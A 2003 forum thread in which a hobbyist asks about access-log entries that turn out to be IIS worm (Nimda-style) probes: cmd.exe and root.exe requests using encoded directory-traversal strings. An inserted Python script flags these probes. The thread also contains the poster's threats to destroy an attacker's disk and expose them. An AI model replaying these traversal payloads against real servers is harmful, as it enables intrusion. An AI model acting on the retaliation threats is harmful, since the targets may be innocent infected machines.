TrickyRic
Joined: 02 May 2003 Posts: 10 Location: UK
Posted: Thu Jul 03, 2003 12:51 pm Post subject: I don't believe this
Hi, about 2 months back I came here for help as I thought I was being hacked by someone using a spoofed IP address. Anyway, in the end I decided to leave the server down for a while in the hope the little *** would assume he was somehow blocked. I then gave up on that site and now have a new site to host; it's been up less than a week and I've already found what look like hack attempts in the log file. However, I'm now wondering if it is hack attempts or simply a DoS or a command-line-based web browser. The IP is again spoofed, though after a tracert was made I think I have the actual IP. I'm now beginning to get so ****ed off that if this is another hack attempt, I may decide to do a bit myself and render his/her HDD useless, and then do the same to everyone else who decides to hack my system. I don't encourage hacking, but if that's what it takes to protect myself, I'm willing to do it.
Anyway, my question really is: can somebody please examine this section of log and tell me what exactly is happening? I'm not going to hide the IP as it's spoofed anyway, and if this is a hack attempt I'm not going to waste time hiding his/her identity either; in fact I'll probably rip everything I can about the little *** and make it public. Anyway, I'll shut up now 'cos I could keep typing forever. Here's the log, thanks.
62.194.12.205 - - [03/Jul/2003:04:08:26 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 266
62.194.12.205 - - [03/Jul/2003:04:08:26 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 266
62.194.12.205 - - [03/Jul/2003:04:08:26 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
62.194.12.205 - - [03/Jul/2003:04:08:27 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
62.194.12.205 - - [03/Jul/2003:04:08:28 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
62.194.12.205 - - [03/Jul/2003:04:08:29 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
62.211.167.53 - - [03/Jul/2003:07:27:14 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 266
62.211.167.53 - - [03/Jul/2003:07:27:16 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 266
62.211.167.53 - - [03/Jul/2003:07:27:18 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
62.211.167.53 - - [03/Jul/2003:07:27:21 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
62.211.167.53 - - [03/Jul/2003:07:27:26 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
62.211.167.53 - - [03/Jul/2003:07:27:34 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
62.211.167.53 - - [03/Jul/2003:07:27:39 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
62.211.167.53 - - [03/Jul/2003:07:27:41 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
62.211.167.53 - - [03/Jul/2003:07:27:47 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
62.211.167.53 - - [03/Jul/2003:07:27:52 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
62.211.167.53 - - [03/Jul/2003:07:27:55 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
62.211.167.53 - - [03/Jul/2003:07:27:57 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
62.211.167.53 - - [03/Jul/2003:07:28:18 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
62.211.167.53 - - [03/Jul/2003:07:28:23 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
...oh, and I don't know if that's the end of whatever they were doing; I closed the port again at this point.
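The probe pattern in the log above (requests for root.exe, and for cmd.exe behind double-encoded and overlong-UTF-8 directory traversal, which the later replies identify as the IIS worm / Nimda propagation signature) is easy to pick out of a log file automatically, and the useful question for the server owner is not just "who probed" but "did the server ever answer one of these with a 2xx". The following is an added example, not code from this thread or from Abyss: it assumes Common Log Format lines like the ones posted, the signature names are descriptive labels chosen here rather than an official taxonomy, and the sample lines are constructed with RFC 5737 documentation addresses.

```python
"""
Added example (not from the original thread): flag IIS worm probes
(root.exe / cmd.exe with traversal encodings) in Common Log Format lines
and report, per source IP, whether the server ever served one with 2xx.

Assumed log line shape (Abyss/Apache style):
  <ip> - - [<timestamp>] "<method> <path> <proto>" <status> <bytes>
Sample lines below are constructed; IPs are RFC 5737 documentation addresses.
"""
import re
from collections import defaultdict
from urllib.parse import unquote

CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]+))?" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)$'
)

# (label, regex) pairs checked against the raw path and its decoded forms.
# Labels are names chosen for this example, not vendor signature IDs.
SIGNATURES = [
    ("root.exe backdoor probe", re.compile(r"/root\.exe", re.I)),
    ("cmd.exe via traversal", re.compile(r"/winnt/system32/cmd\.exe", re.I)),
    ("double-encoded traversal (%255c / %252f)", re.compile(r"%25(5c|2f)", re.I)),
    ("overlong UTF-8 traversal (%c0%af, %c1%1c, %c1%9c)",
     re.compile(r"%c[01]%(af|1c|9c|2f)", re.I)),
]


def parse_line(line):
    """Return a dict of fields for one CLF line, or None if it does not parse."""
    m = CLF_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def classify(path):
    """Return the labels of every signature that matches the request path.

    The raw path, its single decode and its double decode are all examined,
    so '%255c' (which decodes to '%5c' and then to a backslash) is caught
    whichever form a server or log writer left it in.
    """
    candidates = {path, unquote(path), unquote(unquote(path))}
    return [name for name, rx in SIGNATURES if any(rx.search(c) for c in candidates)]


def analyse(lines):
    """Group worm-probe hits by source IP.

    Returns {ip: {"probes": n, "signatures": set, "served_2xx": n}}.
    400/404 on these paths means the server refused them, as in the thread's
    log; a 2xx would be the case worth investigating on the host itself.
    """
    report = defaultdict(lambda: {"probes": 0, "signatures": set(), "served_2xx": 0})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # not a log line we understand; skip rather than guess
        hits = classify(rec["path"])
        if not hits:
            continue
        entry = report[rec["ip"]]
        entry["probes"] += 1
        entry["signatures"].update(hits)
        if 200 <= rec["status"] < 300:
            entry["served_2xx"] += 1
    return dict(report)


# Constructed sample: one scanner that was refused, one ordinary visitor,
# and one (hypothetical) probe that a server actually answered with 200.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Jul/2003:04:08:26 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 266',
    '192.0.2.10 - - [03/Jul/2003:04:08:28 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268',
    '192.0.2.10 - - [03/Jul/2003:04:08:29 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268',
    '198.51.100.7 - - [03/Jul/2003:04:10:00 +0100] "GET /main.html HTTP/1.1" 200 3893',
    '203.0.113.5 - - [03/Jul/2003:04:12:00 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    for ip, info in sorted(analyse(SAMPLE_LOG).items()):
        verdict = "SERVED 2xx, check the host" if info["served_2xx"] else "refused"
        print(f"{ip}: {info['probes']} probe(s), {verdict}; {sorted(info['signatures'])}")
```

Run against a real access log with `analyse(open("access.log"))`. Because the worm sends the same fixed list of paths to every address it reaches, a burst of these from one IP with nothing but 4xx responses is background noise from an infected machine somewhere; only a 2xx on one of these paths, or traffic that does not look like the fixed list, deserves a closer look.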
wiccaan
Joined: 04 Jul 2003 Posts: 19
Posted: Fri Jul 04, 2003 6:12 am Post subject:
Well, my log looks similar but I know mine aren't from hacking. Anyway, if you noticed, the log says GET, which means someone has asked for a file from your site. This isn't indicating that you were hacked. It's just saying that someone has requested a file from your server. Here is a small section of my log (and yes, I deleted the IPs for safety reasons):
- - [28/Jun/2003:03:28:16 +1133] "GET / HTTP/1.1" 304 0
- - [28/Jun/2003:03:28:16 +1133] "GET /gc.bmp HTTP/1.1" 304 0
- - [29/Jun/2003:17:16:47 +1133] "GET / HTTP/1.1" 304 0
- - [29/Jun/2003:17:16:48 +1133] "GET /gc.bmp HTTP/1.1" 200 16384
- - [29/Jun/2003:17:16:49 +1133] "GET /main.html HTTP/1.1" 304 0
- - [29/Jun/2003:17:17:28 +1133] "GET / HTTP/1.1" 200 1495
- - [29/Jun/2003:17:17:28 +1133] "GET /gc.bmp HTTP/1.1" 200 569344
- - [29/Jun/2003:17:17:31 +1133] "GET /main.html HTTP/1.1" 200 3893
- - [29/Jun/2003:17:17:31 +1133] "GET /banner.bmp HTTP/1.1" 200 590366
- - [29/Jun/2003:17:16:49 +1133] "GET /banner.bmp HTTP/1.1" 200 262144
- - [29/Jun/2003:17:17:39 +1133] "GET /downloads.html HTTP/1.1" 200 2999
- - [29/Jun/2003:17:17:39 +1133] "GET /enter.gif HTTP/1.1" 200 2317
- - [29/Jun/2003:17:17:39 +1133] "GET /leave.gif HTTP/1.1" 200 2276
- - [29/Jun/2003:17:17:39 +1133] "GET /banner.bmp HTTP/1.1" 200 40960
- - [29/Jun/2003:17:17:39 +1133] "GET /downloads2.html HTTP/1.1" 200 6285
- - [29/Jun/2003:17:17:45 +1133] "GET /button.gif HTTP/1.1" 200 1584
- - [29/Jun/2003:17:17:54 +1133] "GET /banner.bmp HTTP/1.1" 200 221184
- - [29/Jun/2003:17:20:04 +1133] "GET /gc.bmp HTTP/1.1" 200 315392
- - [29/Jun/2003:17:20:09 +1133] "GET /downloads.html HTTP/1.1" 200 2999
- - [29/Jun/2003:17:20:09 +1133] "GET /enter.gif HTTP/1.1" 200 2317
- - [29/Jun/2003:17:20:09 +1133] "GET /leave.gif HTTP/1.1" 200 2276
- - [29/Jun/2003:17:20:09 +1133] "GET /downloads2.html HTTP/1.1" 200 6285
- - [29/Jun/2003:17:20:09 +1133] "GET /button.gif HTTP/1.1" 200 1584
os17fan
Joined: 21 Mar 2003 Posts: 531 Location: USA
Posted: Fri Jul 04, 2003 6:59 am Post subject:
I know exactly what this is: this is either the "HTTP_IIS_ISAPI_Extension" attack or the "Nimda_Propagation" attack. Your best bet is to buy Norton Internet Security; it's about $68 and that blocks any IP address trying to do those types of attacks. You have nothing to worry about since Abyss web server is not an IIS web server, but I don't know about the Nimda one. Get Norton Internet Security 2003. 8)
_________________
This web server is the best!
TrickyRic
Joined: 02 May 2003 Posts: 10 Location: UK
Posted: Fri Jul 04, 2003 1:38 pm Post subject: thanks
Thanks for the posts. I'm interested in the Norton Internet Security program; I've probably got a copy floating round here somewhere, but before I install, can I just check: my server's also running FTP and an IRC channel; this security program isn't likely to interfere with them, is it?
Thanks.
I'll look into the attacks you mentioned and see what exactly they're trying to do :)
Thanks again
TrickyRic
Joined: 02 May 2003 Posts: 10 Location: UK
Posted: Fri Jul 04, 2003 2:58 pm Post subject: hmm
I found Norton Internet Security 2002 and installed it. The installer said something about not being able to open the exe used to install the program, so I had to open it manually; it installed fine after that and I restarted the server. But now, when I try to open any of the installed exe files I just get a blank (white) window with nothing on it, and the parental control exe just shows a C++ error and doesn't open. My server's running Win98 and the CD says it runs on 98. The only program I have that could be conflicting is WinPatrol, which monitors changes to the system (like new programs) and asks if I wish to let the program run; however, I told WinPatrol to allow Norton to do anything it wishes to and it didn't show any errors.
Any ideas? Thanks
aprelium
Joined: 22 Mar 2002 Posts: 6800
TrickyRic
Joined: 02 May 2003 Posts: 10 Location: UK
Posted: Fri Jul 04, 2003 4:47 pm Post subject: yay
Thanks, that link just made my day lol. Guess I can now sit back and laugh at people attempting to use this method to hack me :D
3 cheers to Abyss for automatically refusing this request :D